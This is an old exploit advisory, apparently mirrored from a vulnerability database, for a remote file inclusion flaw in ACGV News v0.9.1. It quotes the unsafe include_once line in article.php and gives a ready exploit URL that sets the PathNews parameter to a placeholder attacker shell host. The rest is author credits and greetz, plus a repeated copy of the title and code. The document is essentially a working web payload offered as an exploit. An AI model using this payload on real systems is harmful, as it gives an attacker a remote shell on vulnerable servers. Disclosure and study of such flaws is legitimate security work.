ACGV News <= v0.9.1 (PathNews) Remote File Inclusion Exploit

2006-09-0600:00:00

vulners.com

#==============================================================================================
#ACGV News <= v0.9.1 (PathNews) Remote File Inclusion Exploit
#===============================================================================================

#Critical Level : Dangerous

#Venedor site : http://www.acgv.fr.st/

#Version : v0.9.1

#================================================================================================
#Bug in : article.php

#Vlu Code :
#--------------------------------

include_once($PathNews."header.php");

#================================================================================================

#Exploit :
#--------------------------------

#http://sitename.com/[Script Path]/article.php?PathNews=http://SHELLURL.COM?

#================================================================================================
#Discoverd By : SHiKaA

#Conatact : SHiKaA-[at]hotmail.com

#GreetZ : Str0ke SimOO KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd

==================================================================================================

JSON

ACGV News &lt;= v0.9.1 &#40;PathNews&#41; Remote File Inclusion Exploit

include_once($PathNews."header.php");

==================================================================================================

ACGV News <= v0.9.1 (PathNews) Remote File Inclusion Exploit